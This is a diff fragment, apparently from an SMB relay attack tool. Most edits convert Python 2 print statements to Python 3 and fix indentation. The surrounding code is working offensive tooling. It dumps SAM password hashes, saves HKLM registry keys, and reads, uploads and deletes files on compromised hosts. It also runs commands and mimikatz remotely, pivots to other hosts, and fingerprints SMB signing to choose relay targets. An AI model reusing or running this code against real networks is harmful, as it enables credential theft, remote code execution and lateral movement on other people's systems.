Hashes = dump_file_hashes(BootKey, SaveSam_Path+"./Sam-"+Host+".tmp")
WriteOutputToFile(Hashes, "./Hash-Dump-"+Host+".txt")
except:
print "[+] Live dump failed, is python-crypto installed? "
print ("[+] Live dump failed, is python-crypto installed? ")
pass
print "[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt"
print ("[+] The SAM file was saved in: ./relay-dumps/Sam-"+Host+".tmp and the hashes in ./relay-dumps/Hash-Dumped-"+Host+".txt")
return data
except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########Save An HKLM Key And Its Subkeys#############
@ -1771,12 +1771,12 @@ def SaveAKey(data, s, Host, Key):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..."
print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "Retrying..."
print ("Retrying...")
time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1791,14 +1791,14 @@ def SaveAKey(data, s, Host, Key):
##Error handling.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n"
print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
data,s,handler,f = OpenHKLM(data,s,f)
data,s,f = SaveKeyToFile("C:\\Windows\\Temp\\"+Key+".tmp", Key, handler, f, data, s)
if data[8:10] != "\x25\x00":
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
data,s = CloseFID(f, data, s)
data,s,f = SMBOpenFile("\\Windows\\Temp\\"+Key+".tmp", "C", Host, RW, data, s)
@ -1814,12 +1814,12 @@ def SaveAKey(data, s, Host, Key):
#After everything has been cleaned up, we write the output to a file.
WriteOutputToFile(Output, Host+"-"+Key+".tmp")
print "[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp"
print ("[+] The "+Key+" key and its subkeys were saved in: ./relay-dumps/"+Host+"-"+Key+".tmp")
return data
except:
#Don't loose this connection because something went wrong, it's a good one. Hashdump might fail, while command works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########ReadAFile#############
@ -1828,11 +1828,11 @@ def ReadFile(data, s, File, Host):
File = File.replace("/","\\")
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s)
print Output
print (Output)
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Read failed. Remote filename was typed correctly?"
print ("[+] Read failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
def GetAfFile(data, s, File, Host):
@ -1841,11 +1841,11 @@ def GetAfFile(data, s, File, Host):
data,s,f = SMBOpenFile(File, "C", Host, READ, data, s)
data,s,Output = GrabAndRead(f, File, data, s)
WriteOutputToFile(Output, Host+"-"+File)
print "[+] Done."
print ("[+] Done.")
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Get file failed. Remote filename was typed correctly?"
print ("[+] Get file failed. Remote filename was typed correctly?")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########UploadAFile#############
@ -1857,7 +1857,7 @@ def WriteFile(data, s, File, FileSize, FileContent, Host):
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Write failed."
print ("[+] Write failed.")
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
##########DeleteAFile############
@ -1868,7 +1868,7 @@ def DeleteFile(data, s, File, Host):
data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Command was successful, ret true.
except:
print "[+] Delete operation failed.\n[+] Something went wrong."
print ("[+] Delete operation failed.\n[+] Something went wrong.")
data,s = CloseTID(data, s)
return ModifySMBRetCode(data) ##Don't ditch the connection because something went wrong.
@ -1890,7 +1890,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
time.sleep(1)
data,s,f = SMBOpenFile(LogFile, "C", Host, RW, data, s)
data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output
print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:')
@ -1900,7 +1900,7 @@ def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, Fi
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########Runas#############
@ -1922,7 +1922,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
time.sleep(1)
data,s,f = SMBOpenFile( LogFile, "C", Host, RW, data, s)
data,s,Output = ReadAndDelete(f, LogFile, data, s)
print Output
print (Output)
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
Logs.info('Command executed:')
@ -1932,7 +1932,7 @@ def RunAsCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName)
except:
data = DeleteFile(data, s, "\\Windows\\Temp\\"+FileName, Host)
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########MimiKatz RPC#############
@ -1961,7 +1961,7 @@ def InstallMimiKatz(data, s, clientIP, Username, Domain, Command, Logs, Host, Fi
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileName):
@ -1990,7 +1990,7 @@ def RunMimiCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, FileNam
return ModifySMBRetCode(data)
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32."
print ("[+] Something went wrong while calling mimikatz. Maybe it's a 32bits system? Try mimi32.")
return ModifySMBRetCode(data)
##########Pivot#############
@ -2017,7 +2017,7 @@ def PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Host, RunAsPath,
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########VerifyPivot#############
@ -2049,7 +2049,7 @@ def VerifyPivot(data, s, clientIP, Username, Domain, Pivot, Logs, Host, RunAsPat
except:
#Don't loose this connection because something went wrong, it's a good one. Commands might fail, while hashdump works.
print "[+] Something went wrong, try something else."
print ("[+] Something went wrong, try something else.")
return ModifySMBRetCode(data)
##########DoSomethingDumb#############


@ -388,20 +388,20 @@ class SMBSessionSetupAndxAUTH(Packet):
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderTagLenOfLen"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLenOfLen"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLenOfLen"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLenOfLen"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["Data"])
NTLMData = str(self.fields["Data"])
###### ASN Stuff
###### ASN Stuff
if len(NTLMData) > 255:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
self.fields["ApplicationHeaderTagLenOfLen"] = "\x82"
self.fields["ApplicationHeaderLen"] = struct.pack(">H", len(SecurityBlobLen)-0)
else:
self.fields["ApplicationHeaderTagLenOfLen"] = "\x81"
self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
self.fields["ApplicationHeaderLen"] = struct.pack(">B", len(SecurityBlobLen)-3)
if len(NTLMData)-8 > 255:
self.fields["AsnSecMechLenOfLen"] = "\x82"
self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
self.fields["AsnSecMechLen"] = struct.pack(">H", len(SecurityBlobLen)-4)
else:
self.fields["AsnSecMechLenOfLen"] = "\x81"
self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
self.fields["AsnSecMechLen"] = struct.pack(">B", len(SecurityBlobLen)-6)
if len(NTLMData)-12 > 255:
self.fields["ChoosedTagLenOfLen"] = "\x82"


@ -126,7 +126,7 @@ class SMBNegoDataLanMan(Packet):
#####################
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def IsSigningEnabled(data):
if data[39] == "\x0f":
@ -141,27 +141,27 @@ def dtoa(d):
return inet_ntoa(struct.pack("!L", d))
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
try:
length = struct.unpack('<H',data[43:45])[0]
if length > 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[48+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
if length <= 255:
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def GetHostnameAndDomainName(data):
try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
try:
DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])
#If max length domain name, there won't be a \x00\x00\x00 delineator to split on
if Hostname == '':
DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
if Hostname == '':
DomainJoined = data[81:110].replace('\x00','')
Hostname = data[113:].replace('\x00','')
return Hostname, DomainJoined
except:
return "Could not get Hostname.", "Could not get Domain joined"
def DomainGrab(Host):
s = socket(AF_INET, SOCK_STREAM)
@ -169,7 +169,7 @@ def DomainGrab(Host):
s.settimeout(Timeout)
s.connect(Host)
except:
print "Host down or port close, skipping"
print ("Host down or port close, skipping")
pass
try:
h = SMBHeaderLanMan(cmd="\x72",mid="\x01\x00",flag1="\x00", flag2="\x00\x00")
@ -191,7 +191,7 @@ def SmbFinger(Host):
s.settimeout(Timeout)
s.connect(Host)
except:
print "Host down or port close, skipping"
print ("Host down or port close, skipping")
pass
try:
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
@ -252,10 +252,10 @@ def ShowResults(Host):
Signing, OsVer, LanManClient = SmbFinger(Host)
enabled = color("SMB signing is mandatory. Choose another target", 1, 1)
disabled = color("SMB signing: False", 2, 1)
print color("Retrieving information for %s..."%Host[0], 8, 1)
print enabled if Signing else disabled
print color("Os version: '%s'"%(OsVer), 8, 3)
print color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3)
print (color("Retrieving information for %s..."%Host[0], 8, 1))
print (enabled if Signing else disabled)
print (color("Os version: '%s'"%(OsVer), 8, 3))
print (color("Hostname: '%s'\nPart of the '%s' domain"%(Hostname, DomainJoined), 8, 3))
except:
pass
@ -288,7 +288,7 @@ def ShowScanSmallResults(Host):
Hostname, DomainJoined = DomainGrab(Host)
Signing, OsVer, LanManClient = SmbFinger(Host)
Message ="['%s', Os:'%s', Domain:'%s', Signing:'%s']"%(Host[0], OsVer, DomainJoined, Signing)
print Message
print (Message)
except:
pass
@ -299,13 +299,13 @@ def ShowSigning(Host):
s.settimeout(Timeout)
s.connect((Host, 445))
except:
print "[Pivot Verification Failed]: Target host is down"
print ("[Pivot Verification Failed]: Target host is down" )
return True
try:
Signing = SmbFingerSigning(Host)
if Signing == True:
print "[Pivot Verification Failed]:Signing is enabled. Choose another host."
print ("[Pivot Verification Failed]:Signing is enabled. Choose another host.")
return True
else:
return False